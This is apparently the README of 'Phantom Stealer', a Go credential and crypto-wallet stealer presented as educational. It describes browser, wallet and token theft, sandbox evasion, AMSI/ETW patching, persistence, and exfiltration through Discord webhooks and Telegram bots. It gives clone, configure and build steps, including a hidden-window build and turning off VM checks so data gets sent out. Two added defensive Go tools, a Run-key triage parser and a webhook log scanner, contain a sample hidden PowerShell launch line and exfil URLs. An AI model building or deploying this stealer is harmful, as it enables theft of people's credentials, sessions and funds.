
Phantom Stealer

Educational security research tool demonstrating Windows credential extraction techniques, anti-analysis evasion, and data exfiltration patterns used by modern information stealers.

Educational purposes only

This software is provided for educational and research purposes only. It demonstrates how modern information stealers operate to help security researchers understand attack vectors and develop better defensive measures.

Legal Notice: Using this tool against systems you do not own or have explicit written permission to test is illegal and unethical. The author(s) accept NO responsibility for misuse of this software. By downloading or using this software, you agree to use it ONLY on systems you own or have written authorization to test.

Key capabilities

Phantom Stealer demonstrates a comprehensive set of credential theft and evasion techniques

Browser credentials

Extract passwords, cookies, credit cards, and autofill data from Chrome, Edge, Brave, Opera and other Chromium-based browsers by unwrapping the DPAPI-protected AES-256-GCM key stored in the profile's Local State file, and from Firefox, whose logins are protected by the NSS key database (key4.db) rather than by DPAPI. Caveat: Chrome 127 and later on Windows add app-bound encryption, which routes the key through a SYSTEM-level service that checks the calling process is Chrome, so the plain DPAPI unwrap no longer recovers cookies from current Chrome without additional privilege.

Crypto wallets

Target 40+ desktop and browser extension wallets including Exodus, MetaMask, Phantom, Electrum, and Bitcoin Core

Token grabbing

Extract Discord tokens, Telegram sessions, and Steam credentials from local storage databases

Anti-analysis

Detect VMs, debuggers, and sandboxes through VM artifact checks and timing analysis, and blind in-process telemetry by patching AMSI and ETW. Caveat for testers and defenders: AMSI only inspects script and .NET content loaded into a process, so patching it changes little for a native Go binary unless it later loads such content, and patching EtwEventWrite silences user-mode ETW only; kernel-sourced telemetry such as the process-creation and registry callbacks consumed by EDR agents is unaffected.

Reconnaissance

Gather system information, capture screenshots, monitor clipboard, and extract WiFi passwords

Persistence

Implement multiple persistence mechanisms: Registry Run keys, Startup folders, Scheduled Tasks, and permanent WMI event subscriptions (an __EventFilter bound to a CommandLineEventConsumer). Each leaves a well-known trace: Sysmon events 12/13 for the Run key write, event 4698 in the Security log for task creation, and Sysmon events 19/20/21 for the WMI filter, consumer, and binding.
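The Run-key mechanism above is the easiest of the four to audit from plain `reg query` output. The following is an added example, not code from the Phantom Stealer repository: a small Go triage tool that parses that output and flags values that run from a user-writable directory, go through a script host or LOLBin, or reuse a core Windows binary name outside \Windows\. The sample output is constructed for the demonstration (the host, user and paths are invented), and the heuristics are deliberately narrow; a hit means "look at this", not "this is malicious".

```go
package main

import (
	"bufio"
	"fmt"
	"regexp"
	"strings"
)

// RunEntry is one value under a Run/RunOnce key as printed by `reg query`,
// plus the reasons (if any) it was flagged for review.
type RunEntry struct {
	Key     string
	Name    string
	Command string
	Reasons []string
}

var (
	keyLineRe = regexp.MustCompile(`^HKEY_[A-Z_]+\\`)
	// `reg query` prints "    <name>    REG_SZ    <data>"; value names that
	// themselves contain spaces are not handled by this simple pattern.
	valueLineRe = regexp.MustCompile(`^\s+(\S+)\s+REG_(?:EXPAND_)?SZ\s+(.*)$`)
	// Directories any interactive user can write to.
	writableDirRe = regexp.MustCompile(`(?i)\\(Temp|Downloads|Public|AppData\\Roaming|ProgramData)\\`)
	// Script hosts and proxy-execution binaries commonly used to launch a dropped payload.
	lolbinRe = regexp.MustCompile(`(?i)\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)(\.exe)?\b`)
	// Core Windows binary names that should only ever live under \Windows\.
	systemNameRe = regexp.MustCompile(`(?i)\\(svchost|explorer|lsass|csrss|winlogon)\.exe\b`)
)

// score attaches a reason for every heuristic the command trips.
func score(e *RunEntry) {
	if writableDirRe.MatchString(e.Command) {
		e.Reasons = append(e.Reasons, "runs from a user-writable directory")
	}
	if lolbinRe.MatchString(e.Command) {
		e.Reasons = append(e.Reasons, "launched through a script host or LOLBin")
	}
	if systemNameRe.MatchString(e.Command) && !strings.Contains(strings.ToLower(e.Command), `\windows\`) {
		e.Reasons = append(e.Reasons, "system binary name outside \\Windows\\")
	}
}

// ParseRegQuery parses `reg query` text output for one or more keys and
// returns every REG_SZ/REG_EXPAND_SZ value with its review reasons attached.
func ParseRegQuery(output string) []RunEntry {
	var entries []RunEntry
	key := ""
	sc := bufio.NewScanner(strings.NewReader(output))
	for sc.Scan() {
		line := sc.Text()
		if keyLineRe.MatchString(line) {
			key = strings.TrimSpace(line)
			continue
		}
		m := valueLineRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		e := RunEntry{Key: key, Name: m[1], Command: strings.TrimSpace(m[2])}
		score(&e)
		entries = append(entries, e)
	}
	return entries
}

// Flagged keeps only entries that triggered at least one heuristic.
func Flagged(entries []RunEntry) []RunEntry {
	var out []RunEntry
	for _, e := range entries {
		if len(e.Reasons) > 0 {
			out = append(out, e)
		}
	}
	return out
}

// SampleRegQuery is constructed output (not from a real host) mimicking
// `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.
const SampleRegQuery = `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    Updater     REG_SZ    C:\Users\alice\AppData\Roaming\Updater\svchost.exe
    Helper      REG_SZ    powershell.exe -w hidden -ep bypass -f C:\Users\Public\h.ps1
`

func main() {
	for _, e := range Flagged(ParseRegQuery(SampleRegQuery)) {
		fmt.Printf("%s\\%s -> %s\n  %s\n", e.Key, e.Name, e.Command, strings.Join(e.Reasons, "; "))
	}
}
```

On the constructed sample the OneDrive value passes (AppData\Local is not in the writable-directory list, precisely so this common legitimate entry does not fire), while the two planted values are flagged twice each. Scheduled Tasks, Startup folders and WMI subscriptions need their own enumeration (schtasks, the Startup directories, and the root\subscription namespace), but the same "who launches what, from where" scoring applies to their command lines.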

Exfiltration

Exfiltrate stolen data via Discord webhooks and Telegram bots, bundling the collected files into a ZIP archive first. Both channels are ordinary HTTPS POSTs to discord.com/api/webhooks/... and api.telegram.org/bot.../sendDocument, so the traffic blends with legitimate use of those services; the distinguishing signals are the webhook or bot path in the URL, a multipart upload of a .zip from a process that is not the Discord or Telegram client, and the fact that the webhook URL or bot token is hard-coded in the binary and recoverable with strings.
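Because the destination paths are so distinctive, a defender can pick this exfiltration out of egress logs with two patterns. The block below is an added example, not code from the Phantom Stealer repository: a Go scanner that finds Discord-webhook and Telegram-bot destinations in proxy log lines and reports them with the secret part of the URL masked, so the finding can be shared without handing the token to everyone who reads the ticket. The log lines and the webhook/token values are constructed for the demonstration.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Indicator is one exfiltration hit found in a log line.
type Indicator struct {
	Line     int    // 1-based line number in the input
	Channel  string // "discord-webhook" or "telegram-bot"
	Redacted string // matched destination with the secret portion masked
}

var (
	// Discord webhook URLs carry a channel id and a secret token in the path.
	discordRe = regexp.MustCompile(`https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)`)
	// Telegram Bot API URLs embed the bot token (<id>:<secret>) in the path.
	telegramRe = regexp.MustCompile(`https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]+)/(sendDocument|sendMessage|sendPhoto)`)
)

// mask keeps the first four characters of a secret so hits can be correlated
// across logs without the full token ever being copied into a report.
func mask(s string) string {
	if len(s) <= 4 {
		return strings.Repeat("*", len(s))
	}
	return s[:4] + strings.Repeat("*", len(s)-4)
}

// FindExfilIndicators scans proxy/egress log lines and returns one Indicator
// per Discord-webhook or Telegram-bot destination found.
func FindExfilIndicators(lines []string) []Indicator {
	var out []Indicator
	for i, line := range lines {
		if m := discordRe.FindStringSubmatch(line); m != nil {
			out = append(out, Indicator{
				Line:     i + 1,
				Channel:  "discord-webhook",
				Redacted: fmt.Sprintf("discord.com/api/webhooks/%s/%s", m[1], mask(m[2])),
			})
		}
		if m := telegramRe.FindStringSubmatch(line); m != nil {
			out = append(out, Indicator{
				Line:     i + 1,
				Channel:  "telegram-bot",
				Redacted: fmt.Sprintf("api.telegram.org/bot%s:%s/%s", m[1], mask(m[2]), m[3]),
			})
		}
	}
	return out
}

// SampleLog is a constructed egress log (not real traffic) in a simple
// "<time> <client> <method> <url> <status> [<content-type>]" layout.
var SampleLog = []string{
	"2024-05-01T10:00:01Z 10.0.0.5 GET https://update.example.com/manifest.json 200",
	"2024-05-01T10:00:07Z 10.0.0.5 POST https://discord.com/api/webhooks/1234567890/AbCdEfGhIjKlMnOpQrStUvWxYz 204 multipart/form-data",
	"2024-05-01T10:00:09Z 10.0.0.5 POST https://api.telegram.org/bot123456789:AAEexampleTOKEN_value/sendDocument 200 multipart/form-data",
	"2024-05-01T10:00:12Z 10.0.0.5 GET https://discord.com/channels/@me 200",
}

func main() {
	for _, ind := range FindExfilIndicators(SampleLog) {
		fmt.Printf("line %d: %s -> %s\n", ind.Line, ind.Channel, ind.Redacted)
	}
}
```

The fourth sample line, an ordinary visit to the Discord web client, is deliberately not matched: the signal is the /api/webhooks/ path, not the domain. Where TLS inspection is unavailable and only DNS or SNI is visible, the same two hostnames still serve as a weaker indicator when they appear from hosts that have no business using those services.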

Configuration

Modular configuration system with toggleable features and extensive target definitions

Quick start

Get up and running with Phantom Stealer in minutes

1. Clone the repository

Download the source code from GitHub
git clone https://github.com/1rhino2/phantom-stealer.git
cd phantom-stealer
2. Configure your settings

Edit config/config.go to set your webhook URLs and enable/disable features. Treat the webhook URL and bot token as secrets: anyone who obtains them can post to the same destination, and because they are compiled into the binary they are recoverable from phantom.exe with a tool such as strings, which is also how analysts identify a sample's exfiltration channel.
package config

// Exfiltration destinations used by the exfil module.
var (
    DiscordWebhook = "https://discord.com/api/webhooks/xxxxx/yyyyy" // placeholder, replace with your own
    TelegramToken  = ""                                             // bot token in the form "<id>:<secret>"
    TelegramChatID = ""                                             // numeric chat ID the bot posts to
)
3. Build the executable

Compile with Go 1.21+ on Windows, or cross-compile from another OS by setting GOOS=windows GOARCH=amd64
# Standard build
go build -o phantom.exe .

# Production build: -s -w strip the symbol table and DWARF debug info, -H windowsgui links a GUI-subsystem binary so no console window appears
go build -ldflags "-s -w -H windowsgui" -o phantom.exe .
4. Run for testing

Execute on a test system you own
./phantom.exe
Data will be exfiltrated to your configured Discord webhook or Telegram bot. If the test system is a VM, the evasion module's VM checks will run against it; toggle them off in config/config.go if you want the full collection and exfiltration path to execute, and restrict the VM's network egress to the destination you configured so nothing else leaves the host.

Technical architecture

Written in pure Go with minimal dependencies for maximum portability

Browsers module

Chromium password extraction with DPAPI decryption of the AES-GCM key, plus Firefox logins, which are protected by the NSS key4.db rather than by DPAPI

Wallets module

Desktop and extension wallet file extraction

Tokens module

LevelDB parsing for Discord tokens; Telegram session (tdata) and Steam credential collection

Evasion module

VM detection, debugger checks, AMSI/ETW patching

Recon module

System info gathering and file collection

Exfil module

ZIP creation and webhook transmission

Ready to explore?

Learn how information stealers work and develop better security defenses
